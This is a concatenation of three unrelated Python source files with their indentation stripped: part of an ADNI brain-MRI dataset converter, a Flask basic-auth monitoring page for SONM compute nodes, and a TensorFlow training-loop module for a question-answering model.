self.new_dimensions[1] *
self.new_dimensions[2]):
nfile.write(
'@ATTRIBUTE "pixel ' + str(number + 1) + '" real\n')
nfile.write(
'@ATTRIBUTE diagnosis {' + self.merge_dict[mergeGroup] +
'}\n')
nfile.write('\n@DATA\n')
def writeNames(self):
"""Write Names-file (C5.0)."""
for mergeGroup in self.merge:
with open(self.out_folder[mergeGroup] + self.file_stem + ".names",
'w') as nfile:
nfile.write('diagnosis. | target attribute\n\n')
# nfile.write('ID: label.\n')
# nfile.write('age: continuous.\n')
# nfile.write('sex: M, F.\n')
# nfile.write('APOE A1: discrete 4.\n')
# nfile.write('APOE A2: discrete 4.\n')
# nfile.write('MMSE Total Score: continuous.\n\n')
# for number in range final resolution (192, 192, 160),
# each slice reduced to X components and using every Nth slice:
# THIS NEEDS TO TAKE VALUES FROM command line parameters etc.
nfile.write(
'diagnosis: ' + self.merge_dict[mergeGroup] +
'.\n')
for number in range((self.new_dimensions[0]) *
self.new_dimensions[1] *
self.new_dimensions[2]):
nfile.write(
'pixel ' + str(number + 1) + ': continuous.\n')
def writeCsvHeader(self):
"""Write header for CSV-file (?/Pylearn2)."""
for mergeGroup in self.merge:
with open(self.out_folder[mergeGroup] + self.file_stem + ".csv",
'w') as nfile:
nfile.write('diagnosis,')
for number in range((self.new_dimensions[0]) *
self.new_dimensions[1] *
self.new_dimensions[2]):
nfile.write('pixel_' + str(number + 1) + ',')
nfile.seek(-1, os.SEEK_END)
nfile.truncate()
nfile.write('\n')
def getXmlFilesInFolder(self, folder):
"""Get a list of all XML files in a folder (non-recursive search)."""
xml_files = []
for xml_file in os.listdir(folder):
if xml_file.endswith(".xml"):
xml_files.append(os.path.join(self.input_folder, xml_file))
return xml_files
def filterFiles(self, xmls, visits):
"""Filter out unwanted XML files, i.e. not within specified range."""
print "Filtering through", len(xmls), "XMLs..."
relevant_xmls = []
if self.visits == 6:
relevant_xmls = xmls
else:
for xf in xmls:
tree = ET.parse(xf)
root = tree.getroot()
# if (root.find(".//*visitIdentifier").text not in visits):
j = 0
while j <= visits:
if(root.find(".//*visitIdentifier").text ==
self.visits_dict[j]):
relevant_xmls.append(xf)
j += 1
print "Using", len(relevant_xmls), "XMLs."
return relevant_xmls
def parseXml(self, xml_file):
"""Get associated metadata and corresponding NIfTI file from XML."""
tree = ET.parse(xml_file)
root = tree.getroot()
try:
# 'ID': self.getId(root), 'Age': self.getAge(root),
# 'Sex': self.getSex(root), 'APOE A1': self.getApoeA1(root),
# 'APOE A2': self.getApoeA2(root),
# 'MMSE Score': self.getMmseScore(root),
return {'DX Group': self.getDxGroup(root),
'Nifti File': self.getNiftiFile(root)}
except:
e = sys.exc_info()[0]
print "Error parsing:", e
def getId(self, root):
"""Get subject ID from XML (root) element."""
return root.find(".//*subjectIdentifier").text
def getAge(self, root):
"""Get subject age from XML (root) element."""
return root.find(".//*subjectAge").text
def getSex(self, root):
"""Get subject sex from XML (root) element."""
return root.find(".//*subjectSex").text
def getApoeA1(self, root):
"""Get subject APOE A1 from XML (root) element."""
return root.find(".//*[@item='APOE A1']").text
def getApoeA2(self, root):
"""Get subject APOE A2 from XML (root) element."""
return root.find(".//*[@item='APOE A2']").text
def getMmseScore(self, root):
"""Get subject MMSE Total Score from XML (root) element."""
return root.find(".//*[@attribute='MMSCORE']").text
def getDxGroup(self, root):
"""Get subject diagnostic group from XML (root) element."""
return root.find(".//*[@item='DX Group']").text
def getNiftiFile(self, root):
"""Get corresponding NIfTI file from XML (root) element."""
subjectIdentifier = root.find(".//*subjectIdentifier").text
seriesIdentifier = root.find(".//*seriesIdentifier").text
imageUID = root.find(".//*imageUID").text
searchFor = 'ADNI_' + subjectIdentifier + '_*_' + 'S' + \
seriesIdentifier + '_' + 'I' + imageUID + '.nii'
matches = []
for rootB, dirnames, filenames in os.walk(self.input_folder):
for filename in fnmatch.filter(filenames, searchFor):
matches.append(os.path.join(rootB, filename))
if (matches.__len__() < 1):
print 'There was no corresponding .nii match using the following \
pattern:'
print searchFor
print 'Exiting...'
exit(1)
elif (matches.__len__() > 1):
print 'There was more than one corresponding .nii match using the \
following pattern:'
print searchFor
print 'Exiting...'
exit(1)
return matches[0]
def mergeGroups(self, scheme, group):
"""Merge DX groups."""
if scheme == 0 or scheme is None:
pass
elif scheme == 1:
if group == 'LMCI':
group = 'MCI'
elif scheme == 2:
if group != 'Normal':
group = 'Other'
elif scheme == 3:
if group != 'MCI':
if group == 'LMCI':
group = 'MCI'
else:
group = 'Other'
elif scheme == 4:
if group != 'AD':
group = 'Other'
else:
print "Failed to merge into another group."
return group
def prettyFormat(self, current_file):
"""Produce prettified ouput. For testing purposes."""
# print "ID: ", current_file['ID']
# print "Age: ", current_file['Age']
# print "Sex: ", current_file['Sex']
# print "APOE A1: ", current_file['APOE A1']
# print "APOE A2", current_file['APOE A2']
# print "MMSE Score: ", current_file['MMSE Score']
print "DX Group: ", current_file['DX Group']
print "Nifti File: ", current_file['Nifti File']
def log(self, mergeGroup, message):
"""Write to log."""
with open(self.out_folder[mergeGroup] + self.file_stem +
".log", 'a') as logf:
logf.write(str(message))
def resize(self, img, new_resolution):
"""Resize (data from) 3D image matrix (numpy array)."""
dsfactor = [w / float(f) for w, f in zip(new_resolution, img.shape)]
new_img = nd.interpolation.zoom(img, zoom=dsfactor)
return new_img
def labelToInt(self, label, scheme):
"""Replace pre-merged label (string) with Int."""
if scheme == 0 or scheme is None:
if label == 'Normal':
return '0'
elif label == 'MCI':
return '1'
elif label == 'LMCI':
return '2'
elif label == 'AD':
return '3'
else:
print "Failed to merge into another group."
sys.exit(1)
elif scheme == 1:
if label == 'Normal':
return '0'
elif label == 'MCI':
return '1'
elif label == 'AD':
return '2'
else:
print "Failed to merge into another group."
sys.exit(1)
elif scheme == 2:
if label == 'Normal':
return '0'
elif label == 'Other':
return '1'
else:
print "Failed to merge into another group."
sys.exit(1)
elif scheme == 3:
if label == 'Other':
return '0'
elif label == 'MCI':
return '1'
else:
print "Failed to merge into another group."
sys.exit(1)
elif scheme == 4:
if label == 'Other':
return '0'
elif label == 'AD':
return '1'
else:
print "Failed to merge into another group."
sys.exit(1)
else:
print "Failed to merge into another group."
sys.exit(1)
def maybeReduceDimensionality(self, img_data):
"""Dimensional reduction of 3D image matrix (numpy array)."""
# Iterating through a ndimensional array produces slices along
# the last axis. This is equivalent to data[i,:,:] in this case
img_data = img_data[::self.n_slices]
if self.reduction is None:
"""No Reduction"""
return img_data
elif self.reduction == "H":
"""Histogram"""
from sklearn import preprocessing
img_data = np.asarray(img_data, dtype=float).flat
min_max_scaler = preprocessing.MinMaxScaler()
scaled_data = min_max_scaler.fit_transform(img_data)
hist = np.histogram(scaled_data,
bins=self.reduction_dict["H"]["value"],
range=None, normed=False, weights=None,
density=None)[0]
return hist.reshape(1, hist.shape[0])
elif self.reduction == "P":
"""Slice-wise (randomized) Principal Component Analysis"""
from sklearn.preprocessing import normalize
from sklearn.decomposition import RandomizedPCA
proj_data = []
for img_slice in img_data:
norm_data = normalize(img_slice)
shaped_data = np.reshape(norm_data, norm_data.size)
# shaped_data.shape
rpca = RandomizedPCA(
n_components=self.reduction_dict["P"]["value"],
random_state=0)
proj_slice = rpca.fit_transform(norm_data)
# plt.imshow(proj_data)
# feat_data = rpca.inverse_transform(proj_data)
# plt.imshow(feat_data)
# plt.imshow(norm_data)
proj_data.append(proj_slice)
return proj_data
def processData(self, current_file):
"""Process data."""
return self.maybeReduceDimensionality(self.resize(nib.load(
current_file['Nifti File']).get_data(), self.new_resolution))
def writeLine(self, img_data, current_file):
"""Write image data as line in dataset file(s)."""
for mergeGroup in self.merge:
for format in self.outformat:
output_file = self.out_folder[mergeGroup] + self.file_stem + \
self.out_dict[format]['filesuffix']
output_format = self.out_dict[format]['fileformat']
with open(output_file, "a") as myfile:
# myfile.write(current_file['ID'] + ',' + \
# current_file['Age'] + ',' + current_file['Sex'] + \
# ',' + current_file['APOE A1'] + ',' + \
# current_file['APOE A2'] + ',')
if (format != 'W'):
if (format == 'V'):
myfile.write(
str(self.labelToInt(self.mergeGroups(
mergeGroup, current_file['DX Group']), mergeGroup)) +
',')
else:
myfile.write(
self.mergeGroups(mergeGroup,
current_file['DX Group']) +
',')
i = 0
for data_slice in img_data:
np.savetxt(myfile, (data_slice * (10**6)).astype(int),
delimiter=",", newline=',', fmt="%d") # s/f
i += 1
# hack to remove single (illegal[?]) comma on end of line
# (MAY NOT WORK ON ALL PLATFORMS [i.e. Windows])
myfile.seek(-1, os.SEEK_END)
myfile.truncate()
if (format == 'W'):
myfile.write(
',' + self.mergeGroups(mergeGroup,
current_file['DX Group']))
myfile.write('\n')
group = self.mergeGroups(mergeGroup, current_file['DX Group'])
if group not in self.dx_groups[mergeGroup]:
self.dx_groups[mergeGroup].update({group: 0})
self.dx_groups[mergeGroup].update(
{group: (self.dx_groups[mergeGroup][group] + 1)})
def logRun(self, total_files, images_used):
"""Output relevant information from current conversion."""
for mergeGroup in self.merge:
self.log(mergeGroup, "CONVERSION INFORMATION:\n\n")
dict_forms = []
for format in self.outformat:
dict_forms.append(self.out_dict[format]['fileformat'])
ofs = ' + '.join(str(p) for p in dict_forms)
self.log(
mergeGroup, "Started out using " + str(total_files) +
" .nii files.\n")
if self.max_size is not None:
self.log(mergeGroup,
"Stopped conversion when largest ouput file reached "
+ str(self.max_size) + "GiB.\n")
self.log(
mergeGroup, "Wrote " + str(images_used) + " lines in total.\n")
self.log(mergeGroup, "Resized all NIfTI MR Images to " +
str(self.new_resolution) +
" (lowest resolution in set).\n\n")
self.log(mergeGroup, "Included visits:\n")
for x in xrange(0, self.visits + 1):
self.log(mergeGroup, self.visits_dict[x] + "\n")
self.log(
mergeGroup, "\nUsed every " + str(self.n_slices) +
" slice(s).\n")
if self.reduction is not None:
self.log(mergeGroup, "Reduced dimensionality of each slice to "
+ str(self.reduction_dict[self.reduction]["value"]) +
" components/bins via method " +
str(self.reduction_dict[self.reduction]["name"]) +
".\n")
self.log(mergeGroup, "Converted to " + ofs + " format(s).\n")
self.log(mergeGroup, "Final resolution was (" +
str(self.new_dimensions[0]) +
", " + str(self.new_dimensions[1]) +
", " + str(self.new_dimensions[2]) +
").\n")
self.log(mergeGroup, "DX Groups after (eventual) merging: " +
self.merge_dict[mergeGroup] + ".\n")
self.log(mergeGroup, "\nSubjects in diagnostic groups:\n")
groups = collections.OrderedDict(
sorted(self.dx_groups[mergeGroup].items(), key=lambda t: t[0]))
for k, v in groups.iteritems():
self.log(mergeGroup, k + "\t" + str(v) + "\n")
if __name__ == '__main__':
"""Run only if the script is called explicitly."""
obj = AdniConverter()
|
http_server.py | import logging
import threading
import time
from collections import defaultdict
from functools import wraps
from flask_table import Table, Col
from flask import Flask, render_template, request, Response
from flask_bootstrap import Bootstrap
from source.utils import Nodes
from source.config import Config
logger = logging.getLogger("monitor")
class SonmHttpServer:
KEEP_RUNNING = True
def check_auth(username, password):
return username == Config.base_config["http_server"]["user"] and \
password == Config.base_config["http_server"]["password"]
def authenticate():
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
class NodesTable(Table):
def sort_url(self, col_id, reverse=False):
pass
def get_tr_attrs(self, item):
return {'class': item.css_class}
node = Col('Node')
order_id = Col('Order id')
order_price = Col('Order Price')
deal_id = Col('Deal id')
task_id = Col('Task id')
task_uptime = Col('Task uptime')
node_status = Col('Node status')
since_hb = Col('HB')
def create_app():
app = Flask(__name__)
Bootstrap(app)
@app.route('/', methods=('GET', 'POST'))
@requires_auth
def index():
nodes_content = []
groups = defaultdict(list)
for obj in Nodes.get_nodes_arr():
groups[obj.tag].append(obj)
nodes_content = [{
'node_tag': tag,
'predicted_price': Config.formatted_price_for_tag(tag),
'nodes_table': NodesTable([node.as_table_item for node in nodes],
classes=['table', 'table-striped', 'table-bordered'])
}
for tag, nodes in groups.items()]
return render_template('index.html', nodes=nodes_content, token_balance=Config.balance)
return app
def run_http_server():
if "http_server" in Config.base_config and "run" in Config.base_config["http_server"]:
if not Config.base_config["http_server"]["run"]:
return
if not ("password" in Config.base_config["http_server"] and "user" in Config.base_config["http_server"]):
logger.error("Login and password are mandatory parameters for http server.")
logger.error("Http server stopped")
return
logger.info('Starting HTTP server...')
thread = get_http_thread(create_app())
logger.info("Agent started on port: {}".format(Config.base_config["http_server"]["port"]))
while SonmHttpServer.KEEP_RUNNING:
if not thread.is_alive():
thread = get_http_thread(create_app())
time.sleep(1)
logger.info("Http server stopped")
def get_http_thread(app, host='0.0.0.0', port=8081):
thread = threading.Thread(target=app.run, kwargs={'host': host, 'port': port})
thread.daemon = True
thread.start()
return thread
|
trainer.py | import os
import pickle
import shutil
import time
from datetime import datetime
from os.path import exists, join, relpath
from threading import Thread
from typing import List, Union, Optional, Dict, Tuple
import numpy as np
import tensorflow as tf
from tensorflow.python.training.adadelta import AdadeltaOptimizer
from tensorflow.python.training.adam import AdamOptimizer
from tensorflow.python.training.momentum import MomentumOptimizer
from tensorflow.python.training.rmsprop import RMSPropOptimizer
from hotpot import configurable
from hotpot.configurable import Configurable
from hotpot.data_handling.dataset import TrainingData, Dataset
from hotpot.elmo.lm_model import load_elmo_pretrained_token_embeddings
from hotpot.evaluator import Evaluator, Evaluation, AysncEvaluatorRunner, EvaluatorRunner
from hotpot.model import Model
from hotpot.model_dir import ModelDir
"""
Contains the train-loop and test-loop for our models
"""
class ExponentialDecayWrapper(object):
def __init__(self, decay_steps, decay_rate, staircase=False):
self.decay_steps = decay_steps
self.decay_rate = decay_rate
self.staircase = staircase
def __call__(self, learning_rate, global_step, name=None):
return tf.train.exponential_decay(
learning_rate=learning_rate,
global_step=global_step,
decay_steps=self.decay_steps,
decay_rate=self.decay_rate,
staircase=self.staircase,
name=name)
class ReduceLROnPlateau(object):
def __init__(self, dev_name, scalar_name, factor=0.1, patience=10, verbose=0, mode='min', terminate_th=1e-5):
"""
More or less like the Keras callback.
:param dev_name: name of evaluation dataset
:param scalar_name: name of scalar to monitor
:param factor: new_lr = lr * factor
:param patience: number of evaluations with no improvement after which learning rate will be reduced
:param verbose: 0: quiet, 1: update messages
:param mode: one of {'min', 'max'}. direction in which we want the scalar to improve.
:param terminate: stop training below this value of LR.
"""
self.terminate_th = terminate_th
self.dev_name = dev_name
self.scalar_name = scalar_name
self.factor = factor
self.patience = patience
self.verbose = verbose
if mode not in ['min', 'max']:
raise ValueError(f"mode needs to be either 'min' or 'max', got {mode}")
self.mode = mode
self.best = None
self.counter = 0
self.lr_update_op = None
self.lr_val_op = None
def build_ops(self):
with tf.variable_scope('opt', reuse=True):
lr = tf.get_variable('lr')
self.lr_val_op = lr
self.lr_update_op = lr.assign(tf.multiply(lr, self.factor))
def _improved(self, scalar) -> bool:
if self.best is None:
return True
return scalar > self.best if self.mode == 'max' else scalar < self.best
def _update_lr(self, sess: tf.Session):
sess.run(self.lr_update_op)
def terminate(self, sess: tf.Session) -> bool:
if self.terminate_th is None:
return False
lr = sess.run(self.lr_val_op)
return lr <= self.terminate_th
def __call__(self, updated_scalar_value, sess: tf.Session):
if self._improved(updated_scalar_value):
self.best = updated_scalar_value
self.counter = 0
else:
self.counter += 1
if self.counter >= self.patience:
self._update_lr(sess)
self.counter = 0
if self.verbose:
print("Reduced LR!")
def __getstate__(self):
state = self.__dict__.copy()
state["lr_update_op"] = None
state["lr_val_op"] = None
return state
class SerializableOptimizer(Configurable):
""" So we can record what tensorflow optimizer we used """
def __init__(self, opt_name, params=None):
if 'learning_rate' not in params:
raise ValueError("Must include learning rate")
self.params = params
self.opt_name = opt_name
self.lr_op = None
def get_params(self):
return dict(opt_name=self.opt_name, params=self.params)
def get(self, name=None, lr_decay=None, global_step=None):
params = {} if self.params is None else self.params.copy()
with tf.variable_scope('opt'):
lr_tensor = tf.get_variable('lr', dtype=tf.float32,
initializer=tf.constant(params['learning_rate']),
trainable=False)
if lr_decay is not None:
params['learning_rate'] = lr_decay(learning_rate=params['learning_rate'], global_step=global_step,
name='lr_decay')
self.lr_op = lr_tensor if lr_decay is None else lr_tensor.assign(params['learning_rate'])
params['learning_rate'] = self.lr_op
if self.opt_name == "Adam":
if name is None:
return AdamOptimizer(**params)
else:
return AdamOptimizer(name=name, **params)
elif self.opt_name == "Adadelta":
if name is None:
return AdadeltaOptimizer(**params)
else:
return AdadeltaOptimizer(name=name, **params)
elif self.opt_name == "RMSprop":
if name is None:
return RMSPropOptimizer(**params)
else:
return RMSPropOptimizer(name=name, **params)
elif self.opt_name == "Momentum":
if name is None:
return MomentumOptimizer(**params)
else:
return MomentumOptimizer(name=name, **params)
else:
raise NotImplemented()
def __getstate__(self):
state = self.__dict__.copy()
state["lr_op"] = None
return state
def __setstate__(self, state):
if 'lr_op' not in state:
state['lr_op'] = None
self.__dict__ = state
def init(out: ModelDir, model: Model, override=False):
""" Save our intial setup into `out` """
for dir in [out.save_dir, out.log_dir]:
if os.path.exists(dir):
if len(os.listdir(dir)) > 0:
if override:
print("Clearing %d files/dirs that already existed in %s" % (len(os.listdir(dir)), dir))
shutil.rmtree(dir)
os.makedirs(dir)
else:
raise ValueError()
else:
os.makedirs(dir)
# JSON config just so we always have a human-readable dump of what we are working with
with open(join(out.dir, "model.json"), "w") as f:
f.write(configurable.config_to_json(model, indent=2))
# Actual model saved via pickle
with open(join(out.dir, "model.pkl"), "wb") as f:
pickle.dump(model, f)
# TODO might be nicer to just have a "Trainer" object
class TrainParams(Configurable):
""" Parameters related to training """
def __init__(self,
opt: SerializableOptimizer,
num_epochs: int,
eval_period: int,
log_period: int,
save_period: int,
eval_samples: Dict[str, Optional[int]],
regularization_weight: Optional[float] = None,
async_encoding: Optional[int] = None,
max_checkpoints_to_keep: int = 5,
loss_ema: Optional[float] = .999,
eval_at_zero: bool = False,
monitor_ema: float = .999,
ema: Optional[float] = None,
best_weights: Optional[Tuple[str, str]] = None,
monitor_gradients: bool = False,
clip_val: Optional[float] = None,
clip_norm: Optional[float] = None,
lr_decay=None,
regularization_lambda: Optional[float] = None,
reduce_lr_on_plateau: Optional[ReduceLROnPlateau] = None
):
"""
:param opt: Optimizer to use
:param num_epochs: Number of epochs to train for
:param eval_period: How many batches to train on between evaluations
:param log_period: How many batches to train on between logging
:param save_period: How many batches to train on between checkpointing
:param eval_samples: How many samples to draw during evaluation, None of a full epoch
:param regularization_weight: How highly to weight regulraization, defaults to 1
:param async_encoding: Encoding batches in a seperate thread, and store in a queue of this size
:param max_checkpoints_to_keep: Max number of checkpoints to keep during training
:param loss_ema: EMA weights for monitoring the loss during training
:param eval_at_zero: Run an evaluation cycle before any training
:param monitor_ema: EMA weights for monitor functions
:param ema: EMA to use on the trainable parameters
:param best_weights: Store the weights with the highest scores on the given eval dataset/metric
"""
self.async_encoding = async_encoding
self.regularization_weight = regularization_weight
self.max_checkpoints_to_keep = max_checkpoints_to_keep
self.opt = opt
self.eval_at_zero = eval_at_zero
self.ema = ema
self.loss_ema = loss_ema
self.monitor_ema = monitor_ema
self.num_epochs = num_epochs
self.eval_period = eval_period
self.log_period = log_period
self.save_period = save_period
self.eval_samples = eval_samples
self.best_weights = best_weights
self.monitor_gradients = monitor_gradients
self.clip_val = clip_val
self.clip_norm = clip_norm
self.lr_decay = lr_decay
self.regularization_lambda = regularization_lambda
self.reduce_lr_on_plateau = reduce_lr_on_plateau
if lr_decay is not None and reduce_lr_on_plateau is not None:
raise ValueError("Choose only one lr schedule")
def __setstate__(self, state):
if 'monitor_gradients' not in state:
state['monitor_gradients'] = False
state['clip_val'] = None
state['clip_norm'] = None
if 'lr_decay' not in state:
state['lr_decay'] = None
if 'regularization_lambda' not in state:
state['regularization_lambda'] = None
if 'reduce_lr_on_plateau' not in state:
state['reduce_lr_on_plateau'] = None
self.__dict__ = state
def save_train_start(out,
data: TrainingData,
global_step: int,
evaluators: List[Evaluator],
train_params: TrainParams,
notes: str):
""" Record the training parameters we are about to use into `out` """
if notes is not None:
with open(join(out, "train_from_%d_notes.txt" % global_step), "w") as f:
f.write(notes)
import socket
hostname = socket.gethostname()
train = dict(train_params=train_params,
data=data,
start_at=global_step,
evaluators=evaluators,
date=datetime.now().strftime("%m%d-%H%M%S"),
host=hostname)
with open(join(out, "train_from_%d.json" % global_step), "w") as f:
f.write(configurable.config_to_json(train, indent=2))
with open(join(out, "train_from_%d.pkl" % global_step), "wb") as f:
pickle.dump(train, f)
def _build_train_ops(train_params):
""" Bulid ops we should run during training, including learning, EMA, and summary ops"""
global_step = tf.get_variable('global_step', shape=[], dtype='int32',
initializer=tf.constant_initializer(0), trainable=False)
loss = tf.get_collection(tf.GraphKeys.LOSSES)
if len(loss) == 0:
raise RuntimeError("No losses found in losses collection")
loss = tf.add_n(loss, name="loss")
if len(tf.get_collection(tf.GraphKeys.SUMMARIES)) > 0:
# Add any summaries client stored in SUMMARIES
summary_tensor = tf.summary.merge([[tf.summary.tensor_summary("loss", loss)] +
tf.get_collection(tf.GraphKeys.SUMMARIES)])
else:
summary_tensor = tf.summary.tensor_summary("loss", loss)
# # TODO: remove?
# summary_tensor = tf.summary.merge([tf.summary.tensor_summary("during-training/loss", loss),
# ])
train_objective = loss
if train_params.regularization_lambda is not None:
vars = tf.trainable_variables()
l2_loss = tf.add_n([tf.nn.l2_loss(v) for v in vars
if 'bias' not in v.name]) * train_params.regularization_lambda
tf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, l2_loss)
regularizers = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
if len(regularizers) > 0:
regularization_loss = tf.add_n(regularizers, name="regularization_loss")
if train_params.regularization_weight is not None:
train_objective = train_objective + regularization_loss * train_params.regularization_weight
else:
train_objective = train_objective + regularization_loss
else:
regularization_loss = None
opt = train_params.opt.get(lr_decay=train_params.lr_decay, global_step=global_step)
gradients, variables = zip(*opt.compute_gradients(train_objective))
if train_params.clip_val is not None:
gradients = [
None if gradient is None else tf.clip_by_value(gradient, -train_params.clip_val, train_params.clip_val)
for gradient in gradients]
if train_params.clip_norm is not None:
gradients, _ = tf.clip_by_global_norm(gradients, train_params.clip_norm)
if train_params.monitor_gradients:
summary_tensor = tf.summary.merge([tf.summary.scalar("training-gradients/global-norm",
tf.global_norm(gradients)),
summary_tensor])
for idx, grad in enumerate([g for g in gradients if g is not None]):
summary_tensor = tf.summary.merge([tf.summary.histogram(f"gradients/{variables[idx].name}-grad", grad),
summary_tensor])
train_opt = opt.apply_gradients(zip(gradients, variables), global_step=global_step)
if train_params.ema is not None:
ema = tf.train.ExponentialMovingAverage(decay=train_params.ema)
ema_op = ema.apply(tf.trainable_variables())
with tf.control_dependencies([train_opt]):
# Run the old training op, then update the averages.
train_opt = tf.group(ema_op)
else:
ema = None
# Any collections starting with "monitor" are also added as summaries
to_monitor = {}
for col in tf.get_default_graph().get_all_collection_keys():
if col.startswith("monitor"):
v = tf.get_collection(col)
if len(v) > 0:
print("Monitoring: " + col)
v = tf.add_n(v)
to_monitor[col] = v
if len(to_monitor) > 0:
monitor_ema = tf.train.ExponentialMovingAverage(decay=train_params.monitor_ema, name="MonitorEMA",
zero_debias=True)
train_opt = tf.group(train_opt, monitor_ema.apply(list(to_monitor.values())))
summary_tensor = tf.summary.merge(
[tf.summary.scalar(col, monitor_ema.average(v)) for col, v in to_monitor.items()] +
[summary_tensor])
# EMA for the loss and what we monitoring
if train_params.loss_ema is not None:
loss_ema = tf.train.ExponentialMovingAverage(decay=train_params.loss_ema, name="LossEMA", zero_debias=True)
if regularization_loss is None:
ema_op = loss_ema.apply([loss])
train_opt = tf.group(train_opt, ema_op)
ema_var = loss_ema.average(loss)
summary_tensor = tf.summary.merge([tf.summary.scalar("training-ema/loss", ema_var), summary_tensor])
else:
to_track = [loss, train_objective, regularization_loss]
ema_op = loss_ema.apply(to_track)
train_opt = tf.group(train_opt, ema_op)
tensor_vars = [
tf.summary.scalar("training-ema/loss", loss_ema.average(loss)),
tf.summary.scalar("training-ema/objective", loss_ema.average(train_objective)),
tf.summary.scalar("training-ema/regularization-loss",
loss_ema.average(regularization_loss))
]
summary_tensor = tf.summary.merge([tensor_vars, summary_tensor])
# lr = train_params.opt.lr_op
with tf.variable_scope('opt', reuse=True):
lr = tf.get_variable('lr')
summary_tensor = tf.summary.merge([tf.summary.scalar("learning_rate", lr), summary_tensor])
if train_params.reduce_lr_on_plateau is not None:
train_params.reduce_lr_on_plateau.build_ops()
return loss, summary_tensor, train_opt, global_step, ema
def continue_training(
data: TrainingData,
model: Model,
train_params: TrainParams,
evaluators: List[Evaluator],
out: ModelDir,
notes: str = None,
dry_run=False):
""" Train an already existing model, or start for scatch """
if not exists(out.dir) or os.listdir(out.dir) == 0:
start_training(data, model, train_params, evaluators, out, notes, dry_run)
else:
print("Files already exist, loading most recent model")
resume_training_with(data, out, train_params, evaluators, notes, dry_run)
def start_training(
data: TrainingData,
model: Model,
train_params: TrainParams,
evaluators: List[Evaluator],
out: ModelDir,
notes: str = None,
initialize_from=None,
dry_run=False,
save_graph=False):
""" Train a model from scratch """
if initialize_from is None:
print("Initializing model at: " + out.dir)
model.init(data.get_train_corpus(), data.get_resource_loader())
# Else we assume the model has already completed its first phase of initialization
if not dry_run:
init(out, model, False)
_train(model, data, None, initialize_from,
True, train_params, evaluators, out, notes, dry_run, save_graph=save_graph)
def resume_training(out: ModelDir, notes: str = None, dry_run=False, start_eval=False, async_encoding=None,
dev_batch_size=None):
""" Resume training an existing model """
train_params = out.get_last_train_params()
model = out.get_model()
train_data = train_params["data"]
if dev_batch_size is not None: # this is an ugly hack for now, to handle batchers with too big a size
print(f"changing dev batch size from {train_data.dev_batcher.batch_size} to {dev_batch_size}")
train_data.dev_batcher.batch_size = dev_batch_size
evaluators = train_params["evaluators"]
params = train_params["train_params"]
params.num_epochs = 24 * 3
if async_encoding is not None:
params.async_encoding = async_encoding
latest = tf.train.latest_checkpoint(out.save_dir)
if latest is None:
raise ValueError("No checkpoint to resume from found in " + out.save_dir)
_train(model, train_data, latest, None, False, params, evaluators, out, notes, dry_run, start_eval)
def start_training_with_params(out: ModelDir, notes: str = None, dry_run=False, start_eval=False):
""" Train a model with existing parameters etc """
train_params = out.get_last_train_params()
model = out.get_model()
train_data = train_params["data"]
evaluators = train_params["evaluators"]
params = train_params["train_params"]
params.num_epochs = 24 * 3
_train(model, train_data, None, None, False, params, evaluators, out, notes, dry_run, start_eval)
def resume_training_with(
data: TrainingData,
out: ModelDir,
train_params: TrainParams,
evaluators: List[Evaluator],
notes: str = None,
dry_run: bool = False,
start_eval=False):
""" Resume training an existing model with the specified parameters """
with open(join(out.dir, "model.pkl"), "rb") as f:
model = pickle.load(f)
latest = out.get_latest_checkpoint()
if latest is None:
raise ValueError("No checkpoint to resume from found in " + out.save_dir)
print(f"Loaded checkpoint from {out.save_dir}")
_train(model, data, latest, None, False,
train_params, evaluators, out, notes, dry_run, start_eval=start_eval)
def _train(model: Model,
data: TrainingData,
checkpoint: Union[str, None],
parameter_checkpoint: Union[str, None],
save_start: bool,
train_params: TrainParams,
evaluators: List[Evaluator],
out: ModelDir,
notes=None,
dry_run=False,
start_eval=False,
save_graph=False):
if train_params.async_encoding:
_train_async(model, data, checkpoint, parameter_checkpoint, save_start, train_params,
evaluators, out, notes, dry_run, start_eval, save_graph=save_graph)
return
if train_params.best_weights is not None:
raise NotImplementedError
# spec the model for the current voc/input/batching
train = data.get_train()
eval_datasets = data.get_eval()
loader = data.get_resource_loader()
evaluator_runner = EvaluatorRunner(evaluators, model)
print("Training on %d batches" % len(train))
print("Evaluation datasets: " + " ".join("%s (%d)" % (name, len(data)) for name, data in eval_datasets.items()))
print("Init model...")
model.set_inputs([train] + list(eval_datasets.values()), loader)
print("Setting up model prediction / tf...")
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
with sess.as_default():
pred = model.get_prediction()
evaluator_runner.set_input(pred)
if parameter_checkpoint is not None:
print("Restoring parameters from %s" % parameter_checkpoint)
saver = tf.train.Saver(tf.trainable_variables())
saver.restore(sess, parameter_checkpoint)
saver = None
loss, summary_tensor, train_opt, global_step, _ = _build_train_ops(train_params)
# Pre-compute tensors we need at evaluations time
eval_tensors = []
for ev in evaluators:
eval_tensors.append(ev.tensors_needed(pred))
saver = tf.train.Saver(max_to_keep=train_params.max_checkpoints_to_keep)
summary_writer = tf.summary.FileWriter(out.log_dir)
# Load or initialize the model parameters
if checkpoint is not None:
print("Restoring training from checkpoint...")
saver.restore(sess, checkpoint)
print("Loaded checkpoint: " + str(sess.run(global_step)))
return
else:
if parameter_checkpoint is not None:
print("Initializing training variables...")
vars = [x for x in tf.global_variables() if x not in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)]
sess.run(tf.variables_initializer(vars))
else:
print("Initializing parameters...")
sess.run(tf.global_variables_initializer())
# # TODO : at this place initialize the elmo token embeddings
try:
if model.use_elmo and model.token_lookup:
elmo_token_embed_placeholder, elmo_token_embed_init = model.get_elmo_token_embed_ph_and_op()
print("Loading ELMo weights...")
elmo_token_embed_weights = load_elmo_pretrained_token_embeddings(model.lm_model.embed_weights_file)
sess.run(elmo_token_embed_init, feed_dict={elmo_token_embed_placeholder: elmo_token_embed_weights})
except (AttributeError, NotImplementedError) as e:
pass
# Make sure no bugs occur that add to the graph in the train loop, that can cause (eventuall) OOMs
tf.get_default_graph().finalize()
if save_graph:
summary_writer.add_graph(sess.graph)
print("Start training!")
on_step = sess.run(global_step)
if save_start:
summary_writer.add_graph(sess.graph, global_step=on_step)
